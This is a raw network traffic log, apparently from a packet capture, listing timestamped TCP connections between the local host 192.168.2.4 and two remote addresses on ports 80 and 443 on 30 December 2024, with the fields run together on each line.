                                                                                                                                                                                Dec 30, 2024 19:45:03.352468014 CET805004658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:03.352533102 CET5004680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:03.352658987 CET5004680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:03.352684021 CET5004680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:03.358669043 CET805004658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:03.359147072 CET805004658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:04.796586990 CET805004658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:04.796894073 CET805004658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:04.796957970 CET5004680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:04.797085047 CET5004680192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:04.801846981 CET805004658.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:04.811269045 CET5004780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:04.816088915 CET805004758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:04.816167116 CET5004780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:04.816277027 CET5004780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:04.816296101 CET5004780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:04.821033955 CET805004758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:04.821147919 CET805004758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:06.282278061 CET805004758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:06.282454014 CET805004758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:06.282512903 CET5004780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:06.282565117 CET5004780192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:06.287395000 CET805004758.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:06.303491116 CET5004880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:06.308340073 CET805004858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:06.308404922 CET5004880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:06.308528900 CET5004880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:06.308549881 CET5004880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:06.313306093 CET805004858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:06.313314915 CET805004858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:07.746192932 CET805004858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:07.746268988 CET805004858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:07.746325970 CET5004880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:07.746448040 CET5004880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:07.751235008 CET805004858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:07.764415026 CET5004980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:07.769288063 CET805004958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:07.769375086 CET5004980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:07.769485950 CET5004980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:07.769511938 CET5004980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:07.774261951 CET805004958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:07.774426937 CET805004958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:09.281042099 CET805004958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:09.281207085 CET805004958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:09.281260967 CET5004980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:09.281302929 CET5004980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:09.286026955 CET805004958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:09.342860937 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:09.342900038 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:09.342956066 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:09.343251944 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:09.343265057 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:10.243084908 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:10.243182898 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:10.244865894 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:10.244875908 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:10.245105982 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:10.275435925 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:10.323329926 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:10.821996927 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.027339935 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.027436018 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.044610977 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.044620037 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.044651031 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.044708014 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.044720888 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.044778109 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.046170950 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.046189070 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.046252012 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.046262026 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.046303034 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.266624928 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.266635895 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.266665936 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.266711950 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.266731024 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.266743898 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.266776085 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.268270969 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.268289089 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.268338919 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.268347025 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.268381119 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.268393993 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.269258022 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.269273043 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.269339085 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.269345999 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.269388914 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.369951963 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.369970083 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.370096922 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.370112896 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.370157003 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.489247084 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.489273071 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.489351034 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.489370108 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.489419937 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.489835978 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.489851952 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.489919901 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.489928007 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.489965916 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.491447926 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.491461039 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.491509914 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.491516113 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.491544008 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.491559982 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.492317915 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.492332935 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.492379904 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.492387056 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.492419004 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.493326902 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.493340969 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.493386984 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.493393898 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.493415117 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.493431091 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.494230986 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.494245052 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.494286060 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.494292974 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.494328022 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.494342089 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.575618982 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.575640917 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.575716972 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.575731039 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.575777054 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.710918903 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.710938931 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.710982084 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.710989952 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.711025953 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.711047888 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.711474895 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.711492062 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.711533070 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.711540937 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.711564064 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.711574078 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.711977005 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.711992025 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.712032080 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.712038040 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.712064028 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.712071896 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.712415934 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.712430954 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.712471962 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.712479115 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.712496996 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.712518930 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718144894 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718159914 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718213081 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718220949 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718244076 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718261957 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718298912 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718317032 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718353987 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718359947 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718388081 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718396902 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718416929 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718431950 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718473911 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718481064 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.718496084 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.718518019 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.719208002 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.719221115 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.719261885 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.719269037 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.719291925 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.719316959 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.742259026 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.797564983 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.797585964 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.797630072 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.797640085 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.797672033 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.797693968 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.797931910 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.797946930 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.797996044 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798002958 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.798028946 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798043013 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798295021 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.798310041 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.798350096 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798356056 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.798381090 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798393965 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798721075 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.798737049 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.798773050 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798779011 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.798803091 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.798820019 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.799056053 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.799072027 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.799114943 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.799120903 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.799132109 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.799160004 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.799335957 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.799352884 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.799395084 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.799402952 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.799415112 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.799434900 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.932727098 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.932744026 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.932830095 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.932830095 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.932845116 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.932893038 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933077097 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933092117 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933129072 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933135986 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933149099 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933181047 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933523893 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933538914 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933584929 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933592081 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933619022 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933640957 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933796883 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933815002 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933854103 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933861017 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.933886051 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.933902025 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.934127092 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.934144020 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.934195995 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.934201002 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.934225082 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.934245110 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.934508085 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.934535027 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.934587002 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.934592962 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.934614897 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.934631109 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.934967995 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.934983015 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.935022116 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.935026884 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.935045004 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.935065031 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.935221910 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.935235977 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.935271978 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.935278893 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:11.935305119 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:11.935326099 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.019551039 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.019568920 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.019625902 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.019635916 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.019681931 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.019892931 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.019908905 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.019949913 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.019957066 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.019996881 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020191908 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020207882 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020248890 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020256042 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020267010 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020291090 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020472050 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020487070 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020519972 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020528078 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020558119 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020581961 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020785093 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020798922 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020833015 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020840883 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.020858049 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.020879030 CET50050443192.168.2.451.79.230.147
                                                                                                                                                                                Dec 30, 2024 19:45:12.021068096 CET4435005051.79.230.147192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:12.021084070 CET4435005051.79.230.147192.168.2.4
